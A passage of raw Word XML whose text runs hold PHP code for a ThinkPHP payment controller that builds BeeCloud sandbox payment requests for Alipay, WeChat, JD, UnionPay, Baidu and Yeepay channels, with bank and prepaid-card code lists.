          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BA9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60B1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C27B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decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0BF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17D7BD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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A87CF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7390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FF6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member=Db::name('member')-&gt;where('id',$uid)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C335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39F34F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witch ($member['hide']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F6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23306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13627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434A5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171AD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A5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30333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77AE8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014714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1EE89B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5C9323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13B41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00377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2D4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230A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0598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5F51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06D2C0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账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E26B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0DFC0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审核被拒绝，拒绝原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$member['hidetent']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19967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2ED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A0C2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ED889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4215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8CD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E82C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不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B208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9C58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B5D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member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F082A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42F9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1F57C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_ajaxError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05868F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484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yList(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F068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post.type') ? input('post.type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FCF6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6E8C1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gt;'require|in:pc,app,wap,wx',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F754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AA9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0D3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gt;$type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D683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76A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092F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validate-&gt;getError()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D5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B865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type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0319A4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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D35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pay')-&gt;where($where)-&gt;cache(_cache('db'))-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C103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64740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670C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request_post($url = '', $param = '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405A8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url) || empty($param)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA997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64239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818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rl = $url;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F6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Post = $param;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD13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 = curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5861D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URL,$postUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D989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HEADER, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232FF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RETURNTRANSFER, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01994D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POST, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71477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h, CURLOPT_POSTFIELDS, $curlPost);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE63B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curl_exec($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64907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h);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D01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F3D0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8BC4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y(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370FF3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VENDOR_PATH.'/beecloud/loader.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F593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VENDOR_PATH.'/beecloud/demo/config.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A06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161F1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i-&gt;registerApp(APP_ID, APP_SECRET, MASTER_SECRET, TEST_SECRET);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F36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i-&gt;setSandbox(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54444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ch(Exception $e){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A127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e($e-&gt;getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10919E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869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input("sctype/d") ? input("sctype/d") : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7061A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ookies=input("scookies") ? input("scookies") : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F4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ctype==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1339A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input("money/d") ? input("money/d") : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25845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2149F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266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nput('type/d') ? input("type/d") : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785F5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id=input('titleid/d') ? input("titleid/d") : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7B3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ids=[1=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>充值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',2=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消费</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',3=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>购买</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25973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61414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require|number|max:9',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B565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require|number|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A55F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id'       =&gt;      'require|between:1,3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1D6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gt;      'between:0,3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BC5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5E6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6142A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541BB6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4633B8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id'       =&gt;      $titleid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C9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gt;      $sctype,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9DF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585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2FF8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validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F17FB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218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title=Db::name('pay')-&gt;where('id',$type)-&gt;cache(_cache('db'))-&gt;value('type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0F86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bill_no=strtoupper($typetitle).date('YmdHis').rand(100000,999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A75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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C581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stamp"] = time() * 1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7C2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tal_fee"] = $money;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3934F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ill_no"] = $bill_no;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC71E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titleids[$titleid];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F3A5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turn_url"] = "https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22100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optional"] = (object)array("tag"=&gt;"msgtoreturn");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD7A5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name('pay')-&gt;where('id',$type)-&gt;cache(_cache('db'))-&gt;value('qudao');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F56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7C257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type</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44514A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A40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type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18612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LI_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E0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支付宝及时到账</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294F0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ALI_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5907F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12376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LI_WAP' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B80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支付宝移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACC3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ALI_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18729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0101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LI_QRCODE' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05188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支付宝扫码支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E6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ALI_QRCODE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AED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qr_pay_mode"] = "0";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B898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506E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ALI_OFFLINE_QRCODE' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B791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ALI_OFFLINE_QRCODE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0155A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支付宝线下扫码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA4ED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ali/index.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28286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07A0F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5ADC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D_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A0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D_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CDC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百度网页支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98CD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0238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D_WAP' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6C6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D_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0325D0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百度移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC9E9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920F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JD_B2B' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1095F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JD_B2B";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64040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935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bank_code(int </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) for channel JD_B2B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5F1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9102    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中国工商银行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">      9107    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>招商银行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059A13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9103    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中国农业银行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">      9108    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>光大银行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE8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9104    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交通银行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">          9109    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中国银行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133CE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9105    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中国建设银行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">      9110     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>平安银行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21870C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E836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ank_code"] = 9102;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B904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京东</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B2B";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C7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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E316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JD_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48492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JD_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D81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京东网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551D5B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24CB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JD_WAP' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6E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JD_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6E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京东移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C03F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E5C6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UN_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0923C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UN_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C79C3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银联网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265919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3291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UN_WAP' : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B701F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UN_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777E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银联移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F2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8D3D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WX_NATIVE':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108EB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WX_NATIVE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E506A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微信扫码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E05E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wx/native.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E96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C5BC1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70B2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WX_JSAPI':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329A5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WX_JSAPI";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6739C0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微信</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>H5</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA0D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wx/jsapi.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F52C4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53B9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A51B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YEE_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B351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YEE_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE17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易宝网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB2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2DCF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YEE_WAP' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326D0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YEE_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA0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dentity_id"] = "lengthlessthan50useruniqueid";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F35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易宝移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF13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FCFA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YEE_NOBANKCARD':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B67F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tal_fee"] = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B8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YEE_NOBANKCARD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018E49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rdno"] = "15078120125091678";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB7F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rdpwd"] = "121684730734269992";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42A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7374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frqid </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点卡类型编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E514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骏网一卡通</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(JUNNET),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>盛大卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(SNDACARD),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>神州行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(SZX),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>征途卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(ZHENGTU),Q</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>币卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(QQCARD),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>联通卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(UNICOM),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEDB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久游卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(JIUYOU),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>易充卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(YICHONGCARD),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网易卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(NETEASE),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
